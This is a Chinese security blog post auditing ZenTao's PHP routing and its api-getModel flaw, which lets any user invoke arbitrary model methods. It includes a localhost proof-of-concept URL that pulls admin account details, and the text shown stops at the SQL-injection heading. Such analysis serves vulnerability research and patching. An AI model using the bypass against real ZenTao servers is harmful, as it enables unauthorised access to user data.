<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>禅道全版本rce漏洞分析 | car0ta</title><meta name="keywords" content="audit,PHP"><meta name="author" content="car0ta"><meta name="copyright" content="car0ta"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="zentaoPHP 框架zentaoPHP 支持 MVC 开发模式，框架的核心只有四个文件，分别为调度类 router.class.php，控制类 control.class.php，模块类 model.class.php 和工具类 helper.class.php。 支持GET和PATH_INFO两种方式调用  GET 可以在config&#x2F;my.php里面设置requestType为GET来启用">
<meta property="og:type" content="article">
<meta property="og:title" content="禅道全版本rce漏洞分析">
<meta property="og:url" content="https://car0ta.github.io/2019/09/19/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="car0ta">
<meta property="og:description" content="zentaoPHP 框架zentaoPHP 支持 MVC 开发模式，框架的核心只有四个文件，分别为调度类 router.class.php，控制类 control.class.php，模块类 model.class.php 和工具类 helper.class.php。 支持GET和PATH_INFO两种方式调用  GET 可以在config&#x2F;my.php里面设置requestType为GET来启用">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://gitee.com/car0ta/photo/raw/master/blog_photo/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/cover.png">
<meta property="article:published_time" content="2019-09-18T18:29:08.000Z">
<meta property="article:modified_time" content="2020-09-29T14:32:06.463Z">
<meta property="article:author" content="car0ta">
<meta property="article:tag" content="audit">
<meta property="article:tag" content="PHP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/car0ta/photo/raw/master/blog_photo/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/cover.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://car0ta.github.io/2019/09/19/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '4.2.1',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: 'days',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  isPhotoFigcaption: true,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2020-09-29 22:32:06'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>var activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
  }
}
var activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
  }
}

var autoChangeMode = 'false'
var t = saveToLocal.get('theme')
if (autoChangeMode === '1') {
  var isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
  var isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
  var isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined) {
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport) {
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour <= 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
    }
    window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
      if (saveToLocal.get('theme') === undefined) {
        e.matches ? activateDarkMode() : activateLightMode()
      }
    })
  } else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else if (autoChangeMode === '2') {
  now = new Date()
  hour = now.getHours()
  isNight = hour <= 6 || hour >= 18
  if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else {
  if (t === 'dark') activateDarkMode()
  else if (t === 'light') activateLightMode()
}</script><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="car0ta" type="application/atom+xml">
</head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">Articles</div><div class="length_num">10</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">Tags</div><div class="length_num">7</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#zentaoPHP-框架"><span class="toc-number">1.</span> <span class="toc-text">zentaoPHP 框架</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#审计"><span class="toc-number">2.</span> <span class="toc-text">审计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞分析"><span class="toc-number">3.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用"><span class="toc-number">4.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#sql-注入"><span class="toc-number">4.1.</span> <span class="toc-text">sql 注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#文件读取"><span class="toc-number">4.2.</span> <span class="toc-text">文件读取</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#rce"><span class="toc-number">4.3.</span> <span class="toc-text">rce</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#修复建议"><span class="toc-number">5.</span> <span class="toc-text">修复建议</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参考"><span class="toc-number">6.</span> <span class="toc-text">参考</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(https://gitee.com/car0ta/photo/raw/master/blog_photo/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/cover.png)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">car0ta</a></span><span id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">禅道全版本rce漏洞分析</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2019-09-18T18:29:08.000Z" title="Created 2019-09-19 02:29:08">2019-09-19</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2020-09-29T14:32:06.463Z" title="Updated 2020-09-29 22:32:06">2020-09-29</time></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">Word count:</span><span class="word-count">2.7k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">Reading time:</span><span>12min</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post View:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h2 id="zentaoPHP-框架"><a href="#zentaoPHP-框架" class="headerlink" title="zentaoPHP 框架"></a>zentaoPHP 框架</h2><p>zentaoPHP 支持 MVC 开发模式，框架的核心只有四个文件，分别为调度类 router.class.php，控制类 control.class.php，模块类 model.class.php 和工具类 helper.class.php。</p>
<p>支持GET和PATH_INFO两种方式调用</p>
<ol>
<li><p>GET</p>
<p>可以在config/my.php里面设置requestType为GET来启用GET方式。当打开GET方式之后，访问地址格式为：<code>www/index.php?m=$moduleName&amp;f=$methodName&amp;$param1=$value1&amp;param2=valur2&amp;t=html</code></p>
<p>m: 代表模块名称，比如 m=blog，则代表访问 blog 模块。</p>
<p>f: 代表要访问的模块下 control.php 里面的方法名，比如 f=edit，代表访问 blog/control.php 里面定义的 edit 方法。</p>
<p>t: 代表模板类型，默认是 html，比如 f=edit&amp;t=html，对应的模板文件是 blog/view/edit.html.php。</p>
<p>其他的都是参数，也就是变量中指定的方法的参数。比如 id=1，则代表终调用 blog/control.php 里面的 edit 方法，并向其传 id=1 的参数。</p>
</li>
<li><p>PATH_INFO</p>
<p>需要 webserve r的 url 重写支持。如果是使用 apache 作为 webserver 的话，框架已经自带了 .htaccess 文件，里面已经包含了 url 重写规则；如果是 nginx，需要配置参数。</p>
</li>
</ol>
<h2 id="审计"><a href="#审计" class="headerlink" title="审计"></a>审计</h2><p>在复现漏洞之前先得看一下代码，理解框架的基本结构和路由信息。从 /www/index.php 开始审计，第 66 行处理网页请求，从这里跟进到 /framework/base/router.class.php 第 1005 行，分析一下框架的路由处理。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">parseRequest</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;config-&gt;requestType == <span class="string">'PATH_INFO'</span> <span class="keyword">or</span> <span class="keyword">$this</span>-&gt;config-&gt;requestType == <span class="string">'PATH_INFO2'</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parsePathInfo();</span><br><span class="line">            <span class="keyword">$this</span>-&gt;setRouteByPathInfo();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">elseif</span>(<span class="keyword">$this</span>-&gt;config-&gt;requestType == <span class="string">'GET'</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;parseGET();</span><br><span class="line">            <span class="keyword">$this</span>-&gt;setRouteByGET();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;triggerError(<span class="string">"The request type &#123;$this-&gt;config-&gt;requestType&#125; not supported"</span>, <span class="keyword">__FILE__</span>, <span class="keyword">__LINE__</span>, $exit = <span class="keyword">true</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>parseRequest() 方法的功能是根据请求的类型（PATH_INFO 或 GET）去调用相应的方法。</p>
<p>如果是PATH_INFO 模式，调用parsePathInfo() 方法，获取  <code>$URI</code>  和  <code>$viewType</code> 的值。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">$pathInfo = <span class="keyword">$this</span>-&gt;getPathInfo();</span><br><span class="line">        <span class="keyword">if</span>(!<span class="keyword">empty</span>($pathInfo))</span><br><span class="line">        &#123;</span><br><span class="line">            $dotPos = strrpos($pathInfo, <span class="string">'.'</span>);</span><br><span class="line">            <span class="keyword">if</span>($dotPos)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">$this</span>-&gt;URI      = substr($pathInfo, <span class="number">0</span>, $dotPos);</span><br><span class="line">                <span class="keyword">$this</span>-&gt;viewType = substr($pathInfo, $dotPos + <span class="number">1</span>);</span><br><span class="line">                <span class="keyword">if</span>(strpos(<span class="keyword">$this</span>-&gt;config-&gt;views, <span class="string">','</span> . <span class="keyword">$this</span>-&gt;viewType . <span class="string">','</span>) === <span class="keyword">false</span>)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="keyword">$this</span>-&gt;viewType = <span class="keyword">$this</span>-&gt;config-&gt;default-&gt;view;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure>

<p>再调用 setRouteByPathInfo() 方法，分割网址得到模板名和方法名；在 /config/config.php 中可以看到路由的相关配置：<code>$config-&gt;requestFix  = &#39;-&#39;; </code> 。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span>(strpos(<span class="keyword">$this</span>-&gt;URI, <span class="keyword">$this</span>-&gt;config-&gt;requestFix) !== <span class="keyword">false</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                $items = explode(<span class="keyword">$this</span>-&gt;config-&gt;requestFix, <span class="keyword">$this</span>-&gt;URI);</span><br><span class="line">                <span class="keyword">$this</span>-&gt;setModuleName($items[<span class="number">0</span>]);</span><br><span class="line">                <span class="keyword">$this</span>-&gt;setMethodName($items[<span class="number">1</span>]);</span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure>

<p>跟进 setModuleName() 和 setMethodName() 方法会发现这里对 moduleName 和 methodName 的值都进行了检查，控制模板名和方法名都必须是字母和数字的组合，从而过滤了 <code>../</code> 这样的非法路径，防范了任意文件读取漏洞。</p>
<p>然后调用 setControlFile() 方法设置控制器文件。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">setControlFile</span><span class="params">($exitIfNone = true)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;controlFile = <span class="keyword">$this</span>-&gt;moduleRoot . <span class="keyword">$this</span>-&gt;moduleName . DS . <span class="string">'control.php'</span>;</span><br><span class="line">        <span class="keyword">if</span>(file_exists(<span class="keyword">$this</span>-&gt;controlFile)) <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;triggerError(<span class="string">"the control file $this-&gt;controlFile not found."</span>, <span class="keyword">__FILE__</span>, <span class="keyword">__LINE__</span>, $exitIfNone);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>最终调用的是 <code>/module/moduleName/control.php</code> 下的 <code>methodName</code> 方法。</p>
<p>之后会调用 loadModule() 方法，先通过 php 反射机制获取 className 下 methodName 方法的参数默认值；</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">$defaultParams = <span class="keyword">array</span>();</span><br><span class="line">        $methodReflect = <span class="keyword">new</span> reflectionMethod($className, $methodName);</span><br><span class="line">        <span class="keyword">foreach</span>($methodReflect-&gt;getParameters() <span class="keyword">as</span> $param)</span><br><span class="line">        &#123;</span><br><span class="line">            $name = $param-&gt;getName();</span><br><span class="line"></span><br><span class="line">            $default = <span class="string">'_NOT_SET'</span>;</span><br><span class="line">            <span class="keyword">if</span>(<span class="keyword">isset</span>($paramDefaultValue[$appName][$className][$methodName][$name]))</span><br><span class="line">            &#123;</span><br><span class="line">                $default = $paramDefaultValue[$appName][$className][$methodName][$name];</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">elseif</span>(<span class="keyword">isset</span>($paramDefaultValue[$className][$methodName][$name]))</span><br><span class="line">            &#123;</span><br><span class="line">                $default = $paramDefaultValue[$className][$methodName][$name];</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">elseif</span>($param-&gt;isDefaultValueAvailable())</span><br><span class="line">            &#123;</span><br><span class="line">                $default = $param-&gt;getDefaultValue();</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            $defaultParams[$name] = $default;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>然后再根据 PATH_INFO 模式获取实际请求的参数值：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;config-&gt;requestType != <span class="string">'GET'</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;setParamsByPathInfo($defaultParams);</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>跟进 setParamsByPathInfo() 方法，这里的分隔符 <code>$config-&gt;requestFix  = &#39;-&#39;</code> 。分割 URI 的前两项为前面分析的模块名和方法名，从第三项开始取出参数名以及参数值，和默认参数值进行合并。</p>
<p><strong>所以实际的路由为 <code>/moduleName-Methodname-param=value</code> ，多个参数之间以 <code>-</code> 连接。 经过路由解析后会调用 <code>/module/moduleName/control.php</code> 下的 <code>methodName</code> 方法，然后将参数  <code>param=value</code> 传递给该方法，从而实现相应的功能。</strong></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">setParamsByPathInfo</span><span class="params">($defaultParams = array<span class="params">()</span>, $type = <span class="string">''</span>)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $params = <span class="keyword">array</span>();</span><br><span class="line">        <span class="keyword">if</span>($type != <span class="string">'fetch'</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">/* 分割URI。 Spit the URI. */</span></span><br><span class="line">            $items     = explode(<span class="keyword">$this</span>-&gt;config-&gt;requestFix, <span class="keyword">$this</span>-&gt;URI);</span><br><span class="line">            $itemCount = count($items);</span><br><span class="line"></span><br><span class="line">            <span class="comment">/** </span></span><br><span class="line"><span class="comment">             * 前两项为模块名和方法名，参数从下标2开始。</span></span><br><span class="line"><span class="comment">             * The first two item is moduleName and methodName. So the params should begin at 2.</span></span><br><span class="line"><span class="comment">             **/</span></span><br><span class="line">            <span class="keyword">for</span>($i = <span class="number">2</span>; $i &lt; $itemCount; $i ++)</span><br><span class="line">            &#123;</span><br><span class="line">                $key = key($defaultParams);     <span class="comment">// Get key from the $defaultParams.</span></span><br><span class="line">                <span class="keyword">if</span>(<span class="keyword">empty</span>($key)) <span class="keyword">continue</span>;</span><br><span class="line"></span><br><span class="line">                $params[$key] = $items[$i];</span><br><span class="line">                next($defaultParams);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">$this</span>-&gt;params = <span class="keyword">$this</span>-&gt;mergeParams($defaultParams, $params);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>当然，禅道对不同的身份进行了权限检测，很好的防止了用户的越权操作，从 /www/index.php 第 67 行跟进到 /module/common/model.php 中第1373行 的鉴权函数。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">checkPriv</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $module = <span class="keyword">$this</span>-&gt;app-&gt;getModuleName();</span><br><span class="line">        $method = <span class="keyword">$this</span>-&gt;app-&gt;getMethodName();</span><br><span class="line">        <span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;app-&gt;user-&gt;modifyPassword) <span class="keyword">and</span> (($module != <span class="string">'my'</span> <span class="keyword">or</span> $method != <span class="string">'changepassword'</span>) <span class="keyword">and</span> ($module != <span class="string">'user'</span> <span class="keyword">or</span> $method != <span class="string">'logout'</span>))) <span class="keyword">die</span>(js::locate(helper::createLink(<span class="string">'my'</span>, <span class="string">'changepassword'</span>)));</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;isOpenMethod($module, $method)) <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="keyword">$this</span>-&gt;loadModel(<span class="string">'user'</span>)-&gt;isLogon() <span class="keyword">and</span> <span class="keyword">$this</span>-&gt;server-&gt;php_auth_user) <span class="keyword">$this</span>-&gt;user-&gt;identifyByPhpAuth();</span><br><span class="line">        <span class="keyword">if</span>(!<span class="keyword">$this</span>-&gt;loadModel(<span class="string">'user'</span>)-&gt;isLogon() <span class="keyword">and</span> <span class="keyword">$this</span>-&gt;cookie-&gt;za) <span class="keyword">$this</span>-&gt;user-&gt;identifyByCookie();</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;app-&gt;user))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span>(!commonModel::hasPriv($module, $method)) <span class="keyword">$this</span>-&gt;deny($module, $method);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            $referer  = helper::safe64Encode(<span class="keyword">$this</span>-&gt;app-&gt;getURI(<span class="keyword">true</span>));</span><br><span class="line">            <span class="keyword">die</span>(js::locate(helper::createLink(<span class="string">'user'</span>, <span class="string">'login'</span>, <span class="string">"referer=$referer"</span>)));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>



<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>漏洞代码位于 /module/api/control.php 文件下的 getModel() 方法。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getModel</span><span class="params">($moduleName, $methodName, $params = <span class="string">''</span>)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $params    = explode(<span class="string">','</span>, $params);</span><br><span class="line">        $newParams = array_shift($params);</span><br><span class="line">        <span class="keyword">foreach</span>($params <span class="keyword">as</span> $param)</span><br><span class="line">        &#123;</span><br><span class="line">            $sign = strpos($param, <span class="string">'='</span>) !== <span class="keyword">false</span> ? <span class="string">'&amp;'</span> : <span class="string">','</span>;</span><br><span class="line">            $newParams .= $sign . $param;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        parse_str($newParams, $params);</span><br><span class="line">        $module = <span class="keyword">$this</span>-&gt;loadModel($moduleName);</span><br><span class="line">        $result = call_user_func_array(<span class="keyword">array</span>(&amp;$module, $methodName), $params);</span><br><span class="line">        <span class="keyword">if</span>(dao::isError()) <span class="keyword">die</span>(json_encode(dao::getError()));</span><br><span class="line">        $output[<span class="string">'status'</span>] = $result ? <span class="string">'success'</span> : <span class="string">'fail'</span>;</span><br><span class="line">        $output[<span class="string">'data'</span>]   = json_encode($result);</span><br><span class="line">        $output[<span class="string">'md5'</span>]    = md5($output[<span class="string">'data'</span>]);</span><br><span class="line">        <span class="keyword">$this</span>-&gt;output     = json_encode($output);</span><br><span class="line">        <span class="keyword">die</span>(<span class="keyword">$this</span>-&gt;output);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p><strong>根据禅道路由的特性会将 PATH_INFO 格式的参数赋值给 getModule() 方法，因此这里的 moduleName, methodName, params 参数均可控</strong>。分析代码逻辑可知 params 经过 explode(), paese_str() 等函数后将参数解析成了变量，比如 params 对应位置的参数为 user=carota，那么就会传递 user 变量。之后调用 loadModel() 方法加载相应的模块，接着 通过 call_user_func_array() 函数调用 module 下的 methodName 方法，并将 params 作为参数传递。</p>
<p>跟进 /framework/control.class.php 下的 loadModel() 方法。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">loadModel</span><span class="params">($moduleName = <span class="string">''</span>, $appName = <span class="string">''</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $appName = <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">empty</span>($moduleName)) $moduleName = <span class="keyword">$this</span>-&gt;moduleName;</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">empty</span>($appName))    $appName    = <span class="keyword">$this</span>-&gt;appName;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">global</span> $loadedModels;</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($loadedModels[$appName][$moduleName]))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;$moduleName = $loadedModels[$appName][$moduleName];</span><br><span class="line">        <span class="keyword">$this</span>-&gt;dao = <span class="keyword">$this</span>-&gt;$moduleName-&gt;dao;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;$moduleName;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $modelFile = <span class="keyword">$this</span>-&gt;app-&gt;setModelFile($moduleName, $appName);</span><br></pre></td></tr></table></figure>

<p>通过动态调试可以发现，只要构造正确的 PATH_INFO 模式的路径就可以调用所有的模块；也就是说，通过 getModel() 方法做跳板，禅道 module 下的所有功能的 model.php 都可以越权调用。</p>
<p>但是禅道对每个用户的权限进行了检测，也就是说还需要判断是否任意用户都能调用 api 模块下的 getModel() 方法。我们以该漏洞来获取管理员密码进行动态审计，最终能发现任意用户都能调用 getModel() 方法，因此借助这个跳板我们可以发现一些漏洞。</p>
<p>poc : <a href="http://localhost:8888/zentao/www//api-getModel-user-getRealNameAndEmails-user=admin" target="_blank" rel="noopener">http://localhost:8888/zentao/www//api-getModel-user-getRealNameAndEmails-user=admin</a></p>
<p><img src="https://gitee.com/car0ta/photo/raw/master/blog_photo/%E7%A6%85%E9%81%93%E5%85%A8%E7%89%88%E6%9C%ACrce%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/01.png" alt="01"></p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="sql-注入"><a href="#sql-注入" class="headerlink" title="sql 注入"></a>sql 注入</h3><p>漏洞代码位于 /module/api/model.php 下的 sql() 方法。</p>
